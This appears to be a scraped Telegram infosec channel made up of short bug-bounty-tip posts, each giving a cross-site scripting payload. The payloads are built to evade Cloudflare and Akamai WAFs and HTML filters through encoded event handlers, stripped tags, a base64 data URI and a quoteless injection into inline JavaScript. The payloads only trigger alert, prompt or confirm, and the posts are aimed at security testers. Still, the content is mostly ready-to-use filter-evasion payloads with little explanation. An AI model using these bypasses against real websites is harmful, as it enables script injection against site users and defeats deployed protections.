Information Security
408 subscribers
157 photos
5 videos
9 files
2.28K links
Information Security News

we are @sec_nerd twin brother
Download Telegram
Cloudflare #XSS #Bypass

<img src onerror=%26emsp;prompt`${document.domain}`>
Cloudflare XSS Bypass Payload

<svg%0Aonauxclick=0;[1].some(confirm)//

#Cloudflare #bugbounty #bugbountytips #WAF #Xss
Akamai WAF XSS Payload:

<details onauxclick=confirm`xss`></details>

Right-Click on 'Details', XSS will be fired.

#bugbountytips #bugbounty #xss
XSS filter bypass using stripped </p> tag to obfuscate.

P2 Stored XSS $1500 on a private bug bounty program.

XSS Payload:
<</p>iframe src=javascript:alert()//

#xss #bugbountytip #bugbountytips #bugbounty
Payload xss en aplicación de javascript.

<object data='data:text/html;;;;;base64,PHNjcmlwdD5hbGVydGBZMDAwYDwvc2NyaXB0Pg=='></object>

#xss #payload #payloads #bugbountytips
quoteless #XSS filter bypass (removing HTML chars) in an inline JS function with multiple params

Normal:
/page?x=1&y=2&z=3
Downwards arrow

<body onload="func('1', '2', '3')">

XSS:
/page?x=1&y=%5C&z=);alert(1);//
Downwards arrow

<body onload="func('1', '\', ');alert(1);//'">
please note and share;

blocked:
onauxclick=confirm(2)

bypassed:
onauxclick=[2].some(confirm)

#XSS #WAF #WAFBypass #bugbountytips #security #infosec #hacking
Xss payload waf bypass

Hh'><script>alert(1)</script> = waf
Cross mark


Hh'><marquee loop=1 width=0 onfinish=pr\u006fmpt`_Y000!_`>Y000</marquee> = waf bypassed
Ballot box with check


#payload #xss #waf #bypass